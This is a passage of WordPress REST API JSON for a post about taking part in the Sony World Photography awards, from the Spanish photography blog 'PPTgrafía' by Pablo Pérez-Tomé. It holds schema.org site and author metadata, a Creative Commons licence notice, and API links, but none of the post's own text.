:\/\/www.perez-tome.net\/pptgrafia\/"},{"@type":"ListItem","position":2,"name":"Participaci\u00f3n en el Sony World Photography"}]},{"@type":"WebSite","@id":"https:\/\/www.perez-tome.net\/pptgrafia\/#website","url":"https:\/\/www.perez-tome.net\/pptgrafia\/","name":"PPTgraf\u00eda. Observaci\u00f3n e hipersemanticismo logop\u00e9dico: La vida misma","description":"CREATIVE COMMONS Copyright 2026: Reconocimiento \u2013 NoComercial \u2013 CompartirIgual (by-nc-sa): No se permite un uso comercial de la obra original ni de las posibles obras derivadas, la distribuci\u00f3n de las cuales se debe hacer con una licencia igual a la que regula la obra original.","publisher":{"@id":"https:\/\/www.perez-tome.net\/pptgrafia\/#\/schema\/person\/90f20700c171f4d2c0dda5d88f00cf6b"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.perez-tome.net\/pptgrafia\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":["Person","Organization"],"@id":"https:\/\/www.perez-tome.net\/pptgrafia\/#\/schema\/person\/90f20700c171f4d2c0dda5d88f00cf6b","name":"Pablo P\u00e9rez-Tom\u00e9","image":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/secure.gravatar.com\/avatar\/e5c55b896f84e693c043020e9446fc02709c43b70af9baa420d6430184267f4e?s=96&d=mm&r=pg","url":"https:\/\/secure.gravatar.com\/avatar\/e5c55b896f84e693c043020e9446fc02709c43b70af9baa420d6430184267f4e?s=96&d=mm&r=pg","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e5c55b896f84e693c043020e9446fc02709c43b70af9baa420d6430184267f4e?s=96&d=mm&r=pg","caption":"Pablo P\u00e9rez-Tom\u00e9"},"logo":{"@id":"https:\/\/secure.gravatar.com\/avatar\/e5c55b896f84e693c043020e9446fc02709c43b70af9baa420d6430184267f4e?s=96&d=mm&r=pg"},"description":"In fieri et in actu. Bullir continuo sin parar: De la \u00e9tica a la est\u00e9tica por la geofotograf\u00eda, hist\u00f3rico-social-pol\u00edtica. Inconformista. Comunidad de Madrid - Espa\u00f1a","sameAs":["http:\/\/www.perez-tome.net\/pptgrafia"]}]}},"_links":{"self":[{"href":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-json\/wp\/v2\/posts\/3366","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-json\/wp\/v2\/comments?post=3366"}],"version-history":[{"count":9,"href":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-json\/wp\/v2\/posts\/3366\/revisions"}],"predecessor-version":[{"id":3556,"href":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-json\/wp\/v2\/posts\/3366\/revisions\/3556"}],"wp:attachment":[{"href":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-json\/wp\/v2\/media?parent=3366"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-json\/wp\/v2\/categories?post=3366"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-json\/wp\/v2\/tags?post=3366"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}